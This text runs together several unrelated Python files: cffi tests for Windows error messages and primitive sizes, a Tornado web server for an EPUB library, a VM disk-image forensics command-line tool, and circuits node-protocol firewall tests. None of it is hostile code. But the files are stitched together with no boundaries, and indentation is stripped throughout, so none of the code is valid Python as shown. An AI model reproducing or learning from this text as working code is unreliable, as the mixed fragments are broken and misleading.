ffi = FFI()
code, message = ffi.getwinerror(1155)
assert code == 1155
assert message == ("No application is associated with the "
"specified file for this operation")
ffi.cdef("void SetLastError(int);")
lib = ffi.dlopen("Kernel32.dll")
lib.SetLastError(2)
code, message = ffi.getwinerror()
assert code == 2
assert message == "The system cannot find the file specified"
code, message = ffi.getwinerror(-1)
assert code == 2
assert message == "The system cannot find the file specified"
def test_from_buffer(self):
import array
ffi = FFI()
a = array.array('H', [10000, 20000, 30000])
c = ffi.from_buffer(a)
assert ffi.typeof(c) is ffi.typeof("char[]")
ffi.cast("unsigned short *", c)[1] += 500
assert list(a) == [10000, 20500, 30000]
def test_all_primitives(self):
ffi = FFI()
for name in [
"char",
"short",
"int",
"long",
"long long",
"signed char",
"unsigned char",
"unsigned short",
"unsigned int",
"unsigned long",
"unsigned long long",
"float",
"double",
"long double",
"wchar_t",
"_Bool",
"int8_t",
"uint8_t",
"int16_t",
"uint16_t",
"int32_t",
"uint32_t",
"int64_t",
"uint64_t",
"int_least8_t",
"uint_least8_t",
"int_least16_t",
"uint_least16_t",
"int_least32_t",
"uint_least32_t",
"int_least64_t",
"uint_least64_t",
"int_fast8_t",
"uint_fast8_t",
"int_fast16_t",
"uint_fast16_t",
"int_fast32_t",
"uint_fast32_t",
"int_fast64_t",
"uint_fast64_t",
"intptr_t",
"uintptr_t",
"intmax_t",
"uintmax_t",
"ptrdiff_t",
"size_t",
"ssize_t",
]:
x = ffi.sizeof(name)
assert 1 <= x <= 16
import json
import xml.etree.ElementTree as ET
import re
import os
import datetime
import mimetypes
from StringIO import StringIO
from urlparse import parse_qs as parse_querystring
import tornado.web
from tornado import gen
import authorization
from epub import EPUB
from epub.utils import listFiles
from data.utils import opendb, DatabaseConnection
from data import opds
def accepted_formats(header):
"""
    Returns the list of MIME types accepted by the request, with any
    quality parameters (e.g. ``;q=0.9``) stripped.
    :type header: str
    :param header: value of the HTTP ``Accept`` request header
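    For example::

        >>> accepted_formats("text/html;q=0.9, application/json")
        ['text/html', 'application/json']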
"""
try:
header_list = header.split(",")
for i, v in enumerate(header_list):
header_list[i] = v.split(";")[0].strip()
return header_list
except AttributeError: # No Accept: header?
return []
def user_real_ip(request):
"""
    Tornado is meant to be deployed behind a proxy. The documentation suggests
    ``request.remote_ip`` already honours an ``X-Real-IP`` header, but in
    practice it does not, so the header is checked explicitly here.
:type request: tornado.web.RequestHandler.request
:param request: HTTP Request
"""
if "X-Real-IP" in request.headers:
return request.headers.get("X-Real-IP")
else:
return request.remote_ip
class GeneralErrorHandler(tornado.web.RequestHandler):
def __init__(self, application, request, status_code):
tornado.web.RequestHandler.__init__(self, application, request)
self.set_status(status_code)
def write_error(self, status, **kwargs):
self.write("Bad request")
def prepare(self):
raise tornado.web.HTTPError(400)
class MainHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
self.render("hello.html",
title="Welcome!",
user=user_real_ip(self.request),
host=self.request.headers.get("Host"))
class GetInfo(tornado.web.RequestHandler):
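    # Legacy Tornado coroutine style: ``gen.Task`` wraps the callback-based
    # ``querydb`` below so it can be ``yield``-ed inside ``@gen.engine``.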
@tornado.web.asynchronous
@gen.engine
def get(self, filename):
if filename:
response = yield gen.Task(self.querydb, filename)
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("info.html",
title=response["metadata"]["title"],
id=response["id"],
meta=response["metadata"],
contents=response["toc"],
manifest=response["manifest"],
cover=response["cover"]
)
else:
self.set_header("Content-Type", "application/json")
output = response
output["cover"] = "/book/{0}/manifest/{1}".format(response["id"], response["cover"])
self.write(json.dumps(output, indent=4))
self.finish()
else:
raise tornado.web.HTTPError(404)
def querydb(self, isbn, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ? ", (isbn,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
epubfile = EPUB(path)
output = epubfile.info
output["cover"] = epubfile.cover
output["id"] = epubfile.id
output["toc"] = epubfile.contents
return callback(output)
class ShowManifest(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self, filename):
if filename:
response = yield gen.Task(self.querydb, filename)
self.set_header("Content-Type", "application/json")
self.set_header("Charset", "UTF-8")
self.write(json.dumps(response, indent=4))
self.finish()
else:
raise tornado.web.HTTPError(400)
def querydb(self, isbn, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ? ", (isbn,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
epubfile = EPUB(path)
output = epubfile.info["manifest"]
return callback(output)
class ListFiles(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
response = yield gen.Task(self.cataloguedump)
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("catalogue.html",
output=response, search=False)
else:
self.set_header("Content-Type", "application/json")
self.set_header("Charset", "UTF-8")
self.write(json.dumps(response, indent=4))
self.finish()
def cataloguedump(self, callback):
response = listFiles()
return callback(response)
class ShowFileToc(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self, identifier):
if identifier:
try:
output = yield gen.Task(self.queryToc, identifier)
self.set_header("Content-Type", "application/json")
self.write(json.dumps(output, indent=4))
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def queryToc(self, identifier, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ?", (identifier, )).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = EPUB(path).contents
return callback(output)
class GetFilePart(tornado.web.RequestHandler):
"""Get TOC item"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, part, section=False):
if identifier and part and not section:
try:
output = yield gen.Task(self.perform, identifier, part, section=False)
except IOError:
raise tornado.web.HTTPError(404)
elif identifier and part and section:
try:
output = yield gen.Task(self.perform, identifier, part, section)
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(405)
self.set_header("Content-Type", "text/html")
self.set_header("Charset", "UTF-8")
self.write(output)
self.finish()
def perform(self, identifier, part, section, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ?", (identifier, )).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
try:
epub = EPUB(path)
part_path = ""
for i in epub.contents:
if part == i.get("id"):
part_path = i.get("src")
output = epub.read(re.sub(r"#(.*)", "", part_path)) # strip fragment id.
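            # Rewrite relative href/src attributes so they resolve through
            # the /getpath/<identifier>/ route served by GetFilePath.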
output = re.sub(r'(href|src)="(\.\./)?(.*?)"', '\g<1>="/getpath/{0}/\g<3>"'.format(identifier), output)
output = re.sub(r"(href|src)='(\.\./)?(.*?)'", '\g<1>="/getpath/{0}/\g<3>"'.format(identifier), output)
if section:
try:
from htmlentitydefs import entitydefs
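                    # Feed the named HTML entities (e.g. &nbsp;) to the XML
                    # parser so XHTML with a foreign DTD parses cleanly.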
parser = ET.XMLParser()
parser.parser.UseForeignDTD(True)
parser.entity.update(entitydefs)
source = StringIO(output)
root = ET.parse(source, parser)
section = int(section) - 1
name = root.find(".//{http://www.w3.org/1999/xhtml}body")[section]
output = " ".join([t for t in list(name.itertext())])
                except Exception as e:
                    print(e)
raise tornado.web.HTTPError(404)
except KeyError:
raise tornado.web.HTTPError(404)
return callback(output)
class GetFilePath(tornado.web.RequestHandler):
"""Resolution fallback"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, part):
if identifier and part:
try:
output, mimetype = yield gen.Task(self.perform, identifier, part)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, part, callback):
database, conn = opendb()
try:
            path = database.execute("SELECT path FROM books WHERE isbn = ?",
                                    (identifier,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
filepath = ""
try:
epub = EPUB(path)
for i in epub.namelist():
if i.endswith(part):
filepath = i
output = epub.read(filepath)
mimetype = "" # play safe
for i in epub.info["manifest"]:
if i["href"].endswith(part):
mimetype = i["mimetype"]
except KeyError:
output = "Nope."
mimetype = ""
response = (output, mimetype)
return callback(response)
class GetCover(tornado.web.RequestHandler):
"""Special handle to allow unauthorized fetching of cover"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier):
if identifier:
try:
output, mimetype = yield gen.Task(self.perform, identifier)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, callback):
database, conn = opendb()
try:
            path = database.execute("SELECT path FROM books WHERE isbn = ?",
                                    (identifier,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
try:
epub = EPUB(path)
filepath, mimetype = "", ""
for i in epub.info["manifest"]:
if i["id"] == epub.cover:
filepath = i["href"]
mimetype = i["mimetype"]
output = epub.read(os.path.join(epub.root_folder, filepath)), mimetype
except KeyError:
output = "KEY ERROR"
pass
return callback(output)
class GetResource(tornado.web.RequestHandler):
"""Fetch from manifest"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, manifest_id):
if identifier and manifest_id:
try:
output, mimetype = yield gen.Task(self.perform, identifier, manifest_id)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, toc_id, callback):
database, conn = opendb()
try:
            path = database.execute("SELECT path FROM books WHERE isbn = ?",
                                    (identifier,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
filepath = ""
mimetype = ""
try:
epub = EPUB(path)
for i in epub.info["manifest"]:
if i["id"] == toc_id:
filepath = i["href"]
mimetype = i["mimetype"]
if not mimetype:
mimetype = "text/plain"
output = epub.read(os.path.join(epub.root_folder, filepath)), mimetype
except KeyError:
output = "KEY ERROR"
pass
return callback(output)
class DownloadPublication(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
                path = database.execute(
                    "SELECT path FROM books WHERE isbn = ?", (filename,)
                ).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = open(path, "r")
self.set_header('Content-Type', 'application/zip')
self.set_header('Content-Disposition', 'attachment; filename='+os.path.basename(path)+'')
self.write(output.read())
else:
raise tornado.web.HTTPError(404)
class DownloadWithExLibris(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
                path = database.execute(
                    "SELECT path FROM books WHERE isbn = ?", (filename,)
                ).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = EPUB(path, "a")
exlibris = open(os.path.join(self.get_template_path(), "exlibris.xhtml"), "r").read().format(
host=self.request.headers.get("Host"),
user=user_real_ip(self.request),
date=datetime.date.today())
part = StringIO(exlibris)
output.addpart(part, "exlibris.xhtml", "application/xhtml+xml", 2)
output.close()
output.filename.seek(0)
self.set_header('Content-Type', 'application/zip')
            self.set_header('Content-Disposition',
                            'attachment; filename=' + os.path.basename(path))
self.write(output.filename.read())
else:
raise tornado.web.HTTPError(404)
class DownloadPreview(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
                path = database.execute(
                    "SELECT path FROM books WHERE isbn = ?", (filename,)
                ).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
            # Build the preview: include every guide item up to and including
            # the first one marked type="text".
epub = EPUB(path)
num = None
for n, i in enumerate(epub.info["guide"]):
if i["type"] == "text":
num = n
break
            if num is not None:
items = [x["href"] for x in epub.info["guide"][:(num+1)]]
else:
# if no type="text" is found, provide 20% of content
num = int((len(epub.info["spine"]) / 100.00) * 20.00)
items = [x["href"] for x in epub.info["guide"][:num]]
fakefile = StringIO()
output = EPUB(fakefile, "w")
output.author, output.title, output.language = epub.author, epub.title, epub.language
src = []
for i in items:
from htmlentitydefs import entitydefs
parser = ET.XMLParser()
parser.parser.UseForeignDTD(True)
parser.entity.update(entitydefs)
filelike = StringIO(epub.read(os.path.join(epub.root_folder, i)))
root = ET.parse(filelike, parser)
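                # Collect every src/href resource the part references,
                # resolved relative to the part's own directory.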
map(src.append, [os.path.normpath(os.path.join(os.path.dirname(os.path.join(epub.root_folder, i)),
x.attrib["src"]))
for x in root.findall(".//*[@src]")] +
[os.path.normpath(os.path.join(os.path.dirname(os.path.join(epub.root_folder, i)),
x.attrib["href"]))
for x in root.findall(".//{http://www.w3.org/1999/xhtml}link[@href]")])
src = list(set(src)) # remove multiple references
# add non-part manifest items
for i in src:
output.additem(epub.read(i), i.replace(epub.root_folder+"/", ""), mimetypes.guess_type(i)[0])
# add selected parts
for i in items:
output.addpart(epub.read(os.path.join(epub.root_folder, i)), i, "application/xhtml+xml")
# generate exlibris
exlibris = open(os.path.join(self.get_template_path(), "exlibris.xhtml"), "r").read().format(
host=self.request.headers.get("Host"),
user=user_real_ip(self.request),
date=datetime.date.today())
# add exlibris
part = StringIO(exlibris)
output.addpart(part, "exlibris.xhtml", "application/xhtml+xml", len(output.opf[2])-1)
output.close()
# select file
output.filename.seek(0)
self.set_header('Content-Type', 'application/zip')
# if isolate script, use epub.writetodisk("preview_"+os.path.basename(path))
            self.set_header('Content-Disposition',
                            'attachment; filename=preview_' + os.path.basename(path))
self.write(output.filename.read())
else:
raise tornado.web.HTTPError(404)
class OPDSCatalogue(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
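        # Serve the cached feed.xml when present; otherwise generate the
        # OPDS root catalogue once and cache it to disk (see perform()).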
if os.path.exists(os.path.join(os.path.dirname(__file__), os.path.pardir, "feed.xml")):
self.set_header("Content-Type", "application/atom+xml")
with open("feed.xml", "r") as f:
self.write(f.read())
self.finish()
else:
catalogue = yield gen.Task(self.perform, )
self.set_header("Content-Type", "application/atom+xml")
self.write(catalogue)
self.finish()
def perform(self, callback):
catalogue = opds.generateCatalogRoot()
with open(os.path.join(os.path.dirname(__file__), os.path.pardir, "feed.xml"), "w") as f:
f.write(catalogue)
return callback(catalogue)
class MainQuery(tornado.web.RequestHandler):
def get(self):
query = parse_querystring(self.request.query)
if not query:
self.redirect("/catalogue")
connessione = DatabaseConnection()
result = connessione.query(query.keys()[0], query.values()[0][0])
meta = []
for entry in result:
meta.append({"id": entry["isbn"], "title": entry["title"], "filename": os.path.basename(entry["path"]), "author": entry["author"]})
connessione.exit()
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("catalogue.html", output=meta, search=query.values()[0][0])
else:
self.set_header("Content-Type", "application/json")
self.write(json.dumps(meta))
# Copyright (c) 2016-2017, Matteo Cafasso
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import shutil
import hashlib
import logging
import argparse
from pathlib import Path
from collections import OrderedDict
from tempfile import NamedTemporaryFile
from vminspect.vtscan import VTScanner
from vminspect.usnjrnl import usn_journal
from vminspect.winevtx import WinEventLog
from vminspect.vulnscan import VulnScanner
from vminspect.comparator import DiskComparator
from vminspect.timeline import FSTimeline, NTFSTimeline
from vminspect.winreg import RegistryHive, registry_root
from vminspect.filesystem import FileSystem, hash_filesystem, posix_path
def main():
arguments = parse_arguments()
logging.basicConfig(level=arguments.debug and logging.DEBUG or logging.INFO)
logging.getLogger('requests').setLevel(logging.WARNING)
results = COMMANDS[arguments.name](arguments)
if results is not None:
print(json.dumps(results, indent=2))
def list_files_command(arguments):
return list_files(arguments.disk, identify=arguments.identify,
size=arguments.size)
def list_files(disk, identify=False, size=False):
logger = logging.getLogger('filesystem')
with FileSystem(disk) as filesystem:
logger.debug("Listing files.")
files = hash_filesystem(filesystem)
if identify:
logger.debug("Gatering file types.")
for file_meta in files:
file_meta['type'] = filesystem.file(file_meta['path'])
if size:
logger.debug("Gatering file sizes.")
for file_meta in files:
file_meta['size'] = filesystem.stat(file_meta['path'])['size']
return files
def compare_command(arguments):
return compare_disks(arguments.disk1, arguments.disk2,
identify=arguments.identify, size=arguments.size,
extract=arguments.extract, path=arguments.path,
registry=arguments.registry,
concurrent=arguments.concurrent)
def compare_disks(disk1, disk2, identify=False, size=False, registry=False,
extract=False, path='.', concurrent=False):
with DiskComparator(disk1, disk2) as comparator:
results = comparator.compare(concurrent=concurrent,
identify=identify,
size=size)
if extract:
extract = results['created_files'] + results['modified_files']
files = comparator.extract(1, extract, path=path)
results.update(files)
if registry:
registry = comparator.compare_registry(concurrent=concurrent)
results['registry'] = registry
return results
def registry_command(arguments):
return parse_registry(
arguments.hive, disk=arguments.disk, sort=arguments.sort)
def parse_registry(hive, disk=None, sort=False):
if disk is not None:
with FileSystem(disk) as filesystem:
registry = extract_registry(filesystem, hive)
else:
registry = RegistryHive(hive)
registry.rootkey = registry_root(hive)
if sort:
keys = sorted((k for k in registry.keys()), key=lambda k: k.timestamp)
return OrderedDict((k.path, (k.timestamp, k.values)) for k in keys)
else:
return {k.path: (k.timestamp, k.values) for k in registry.keys()}
def extract_registry(filesystem, path):
with NamedTemporaryFile(buffering=0) as tempfile:
filesystem.download(path, tempfile.name)
return RegistryHive(tempfile.name)
def vtscan_command(arguments):
with VTScanner(arguments.disk, arguments.apikey) as vtscanner:
vtscanner.batchsize = arguments.batchsize
filetypes = arguments.types and arguments.types.split(',') or None
return [r._asdict() for r in vtscanner.scan(filetypes=filetypes)]
def vulnscan_command(arguments):
with VulnScanner(arguments.disk, arguments.url) as vulnscanner:
return [r._asdict() for r in vulnscanner.scan(arguments.concurrency)]
def usnjrnl_command(arguments):
return parse_usnjrnl(arguments.usnjrnl, disk=arguments.disk)
def parse_usnjrnl(usnjrnl, disk=None):
if disk is not None:
with FileSystem(disk) as filesystem:
return extract_usnjrnl(filesystem, usnjrnl)
else:
return [e._asdict() for e in usn_journal(usnjrnl)]
def extract_usnjrnl(filesystem, path):
with NamedTemporaryFile(buffering=0) as tempfile:
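        # Download the journal via its inode; the $UsnJrnl metafile is
        # typically not readable through its path (assumption based on the
        # use of download_inode here).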
root = filesystem.inspect_get_roots()[0]
inode = filesystem.stat(path)['ino']
filesystem.download_inode(root, inode, tempfile.name)
return [e._asdict() for e in usn_journal(tempfile.name)]
def timeline_command(arguments):
logger = logging.getLogger('timeline')
with FSTimeline(arguments.disk) as timeline:
events = [e._asdict() for e in timeline.timeline()]
if arguments.identify:
logger.debug("Gatering file types.")
events = identify_files(timeline, events)
if arguments.hash:
logger.debug("Gatering file hashes.")
events = calculate_hashes(timeline, events)
return events
def usnjrnl_timeline_command(arguments):
logger = logging.getLogger('usnjrnl_timeline')
with NTFSTimeline(arguments.disk) as timeline:
events = [e._asdict() for e in timeline.usnjrnl_timeline()]
if arguments.identify:
logger.debug("Gatering file types.")
events = identify_files(timeline, events)
if arguments.hash:
logger.debug("Gatering file hashes.")
events = calculate_hashes(timeline, events)
if arguments.extract:
logger.debug("Extracting created files.")
extract_created_files(timeline, arguments.extract, events)
if arguments.recover:
logger.debug("Recovering deleted files.")
extract_deleted_files(timeline, arguments.recover, events)
return events
def identify_files(timeline, events):
for event in (e for e in events if e['allocated']):
try:
event['type'] = timeline.file(event['path'])
except RuntimeError:
pass
return events
def calculate_hashes(timeline, events):
for event in (e for e in events if e['allocated']):
try:
event['hash'] = timeline.checksum(event['path'])
except RuntimeError:
pass
return events
def extract_created_files(timeline, path, events):
path = Path(path)
if not path.exists():
path.mkdir(parents=True)
for event in (e for e in events
if 'FILE_CREATE' in e['changes'] and e['allocated']):
try:
if 'hash' in event:
sha_hash = event['hash']
else:
sha_hash = timeline.checksum(event['path'])
source = event['path']
name = Path(posix_path(event['path'])).name
destination = Path(path, '_'.join((sha_hash, name)))
if not destination.exists():
timeline.download(source, str(destination))
except RuntimeError:
pass
def extract_deleted_files(timeline, path, events):
path = Path(path)
root = timeline.inspect_get_roots()[0]
if not path.exists():
path.mkdir(parents=True)
for event in (e for e in events if 'FILE_DELETE' in e['changes']):
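        # A deleted file can often still be recovered through its MFT file
        # reference number, provided its clusters have not been reused.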
inode = event['file_reference_number']
try:
with NamedTemporaryFile(buffering=0) as tempfile:
timeline.download_inode(root, inode, tempfile.name)
name = Path(posix_path(event['path'])).name
sha_hash = hashlib.sha1(tempfile.read()).hexdigest()
destination = Path(path, '_'.join((sha_hash, name)))
shutil.copy(tempfile.name, str(destination))
event['hash'] = sha_hash
event['recovered'] = True
except RuntimeError:
event['recovered'] = False
def eventlog_command(arguments):
with WinEventLog(arguments.disk) as eventlog:
print('\n'.join(eventlog.eventlog(arguments.path)))
def parse_arguments():
parser = argparse.ArgumentParser(description='Inspects VM disk images.')
parser.add_argument('-d', '--debug', action='store_true', default=False,
help='log in debug mode')
subparsers = parser.add_subparsers(dest='name', title='subcommands',
description='valid subcommands')
list_parser = subparsers.add_parser('list',
help='Lists the content of a disk.')
list_parser.add_argument('disk', type=str, help='path to disk image')
list_parser.add_argument('-i', '--identify', action='store_true',
default=False, help='report file types')
list_parser.add_argument('-s', '--size', action='store_true',
default=False, help='report file sizes')
compare_parser = subparsers.add_parser('compare',
help='Compares two disks.')
compare_parser.add_argument('disk1', type=str,
help='path to first disk image')
compare_parser.add_argument('disk2', type=str,
help='path to second disk image')
compare_parser.add_argument('-c', '--concurrent', action='store_true',
default=False, help='use concurrency')
compare_parser.add_argument('-e', '--extract', action='store_true',
default=False, help='extract new files')
compare_parser.add_argument('-p', '--path', type=str, default='.',
help='path where to extract files')
compare_parser.add_argument('-i', '--identify', action='store_true',
default=False, help='report file types')
compare_parser.add_argument('-s', '--size', action='store_true',
default=False, help='report file sizes')
compare_parser.add_argument('-r', '--registry', action='store_true',
default=False, help='compare registry')
registry_parser = subparsers.add_parser(
'registry', help='Lists the content of a registry file.')
registry_parser.add_argument('hive', type=str, help='path to hive file')
registry_parser.add_argument('-s', '--sort', action='store_true',
default=False,
help='sort the keys by timestamp')
registry_parser.add_argument('-d', '--disk', type=str, default=None,
help='path to disk image')
vtscan_parser = subparsers.add_parser(
'vtscan', help='Scans a disk and queries VirusTotal.')
vtscan_parser.add_argument('apikey', type=str, help='VirusTotal API key')
vtscan_parser.add_argument('disk', type=str, help='path to disk image')
vtscan_parser.add_argument('-b', '--batchsize', type=int, default=1,
help='VT requests batch size')
vtscan_parser.add_argument(
'-t', '--types', type=str, default='',
help='comma separated list of file types (REGEX) to be scanned')
vulnscan_parser = subparsers.add_parser(
'vulnscan', help='Scans a disk and queries VBE.')
vulnscan_parser.add_argument('url', type=str,
help='URL to vulnerabilities DB')
vulnscan_parser.add_argument('disk', type=str, help='path to disk image')
    vulnscan_parser.add_argument('-c', '--concurrency', type=int, default=1,
                                 help='number of concurrent queries against DB')
usnjrnl_parser = subparsers.add_parser(
'usnjrnl', help='Parses the Update Sequence Number Journal file.')
usnjrnl_parser.add_argument('-u', '--usnjrnl', type=str,
default='C:\\$Extend\\$UsnJrnl',
help='path to USN file')
usnjrnl_parser.add_argument('-d', '--disk', type=str, default=None,
help='path to disk image')
timeline_parser = subparsers.add_parser('timeline',
help="""Parses the disk content
to build a timeline of events.""")
timeline_parser.add_argument('disk', type=str, help='path to disk image')
timeline_parser.add_argument('-i', '--identify', default=False,
action='store_true', help='report file types')
timeline_parser.add_argument('-s', '--hash', action='store_true',
default=False, help='report file hash (SHA1)')
usnjrnl_timeline_parser = subparsers.add_parser(
'usnjrnl_timeline', help="""Parses the NTFS Update Sequence Number
Journal to build a timeline of events.""")
usnjrnl_timeline_parser.add_argument('disk', type=str,
help='path to disk image')
usnjrnl_timeline_parser.add_argument('-i', '--identify', default=False,
action='store_true',
help='report file types')
usnjrnl_timeline_parser.add_argument('-s', '--hash', action='store_true',
default=False,
help='report file hash (SHA1)')
    usnjrnl_timeline_parser.add_argument('-e', '--extract', type=str,
                                         default='',
                                         help='extract created files into path')
    usnjrnl_timeline_parser.add_argument('-r', '--recover', type=str,
                                         default='',
                                         help='try to recover deleted files into path')
eventlog_parser = subparsers.add_parser(
'eventlog', help="""Parses the given Windows Event Log.""")
eventlog_parser.add_argument('disk', type=str, help='path to disk image')
eventlog_parser.add_argument('path', type=str, help='path to event log')
return parser.parse_args()
COMMANDS = {'list': list_files_command,
'compare': compare_command,
'registry': registry_command,
'vtscan': vtscan_command,
'vulnscan': vulnscan_command,
'usnjrnl': usnjrnl_command,
'timeline': timeline_command,
'usnjrnl_timeline': usnjrnl_timeline_command,
'eventlog': eventlog_command}
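# Illustrative invocations (script and image names are examples only):
#   python vminspect.py timeline disk.qcow2 --identify --hash
#   python vminspect.py usnjrnl --disk disk.qcow2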
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
from pytest import fixture, skip, PLATFORM
from circuits.core import Value
from circuits.node.utils import dump_event, dump_value
if PLATFORM == 'win32':
skip('Broken on Windows')
from circuits import Component, Event
from circuits.node.protocol import Protocol
class return_value(Event):
success = True
class firewall_block(Event):
pass
class AppClient(Component):
write_data = b''
def return_value(self):
return 'Hello server!'
def write(self, data):
self.write_data = data
class AppFirewall(Component):
write_data = b''
def fw_receive(self, event, sock):
return self.__event_is_allow(event)
def fw_send(self, event, sock):
return self.__event_is_allow(event)
def write(self, data):
self.write_data = data
def __event_is_allow(self, event):
allow = 'return_value' == event.name \
and 'prohibits_channel' not in event.channels
if not allow:
self.fire(firewall_block())
return allow
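    # Protocol consults these firewall callables for every event; a falsy
    # return drops the event, and this app additionally fires
    # firewall_block() so the tests below can observe the rejection.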
class AppServer(Component):
write_data = b''
write_sock = None
def return_value(self):
return 'Hello client!'
def write(self, sock, data):
self.write_sock = sock
self.write_data = data
@fixture()
def app_client(request, manager, watcher):
app = AppClient()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol().register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
@fixture()
def app_firewall(request, manager, watcher):
app = AppFirewall()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol(
sock='sock obj',
receive_event_firewall=app.fw_receive,
send_event_firewall=app.fw_send,
).register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
@fixture()
def app_server(request, manager, watcher):
app = AppServer()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol(sock='sock obj', server=True).register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
def test_add_buffer(app_client, watcher):
packet = str.encode(dump_event(return_value(), 1))
app_client.protocol.add_buffer(packet)
assert watcher.wait('return_value_success')
assert watcher.wait('write')
value = Value()
value.value = 'Hello server!'
value.errors = False
value.node_call_id = 1
assert app_client.write_data == str.encode(dump_value(value) + '~~~')
def test_add_buffer_server(app_server, watcher):
packet = str.encode(dump_event(return_value(), 1))
app_server.protocol.add_buffer(packet)
assert watcher.wait('return_value_success')
assert watcher.wait('write')
value = Value()
value.value = 'Hello client!'
value.errors = False
value.node_call_id = 1
assert app_server.write_data == str.encode(dump_value(value) + '~~~')
assert app_server.write_sock == 'sock obj'
def test_firewall_receive(app_firewall, watcher):
# good event
packet = str.encode(dump_event(return_value(), 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('return_value')
# bad name
packet = str.encode(dump_event(Event.create('unallow_event'), 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('firewall_block')
# bad channel
event = return_value()
event.channels = ('prohibits_channel',)
packet = str.encode(dump_event(event, 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('firewall_block')
def test_firewall_send(app_firewall, watcher):
# good event
event = return_value()
generator = app_firewall.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_firewall.write_data == str.encode(dump_event(event, 0) + '~~~')
# bad name
generator = app_firewall.protocol.send(Event.create('unallow_event'))
next(generator) # exec
assert watcher.wait('firewall_block')
# bad channel
event = return_value()
event.channels = ('prohibits_channel',)
generator = app_firewall.protocol.send(event)
next(generator) # exec
assert watcher.wait('firewall_block')
def test_send(app_client, watcher):
event = return_value()
generator = app_client.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_client.write_data == str.encode(dump_event(event, 0) + '~~~')
value = Value()
value.value = 'Hello server!'
value.errors = False
value.node_call_id = 0
app_client.protocol.add_buffer(str.encode(dump_value(value) + '~~~'))
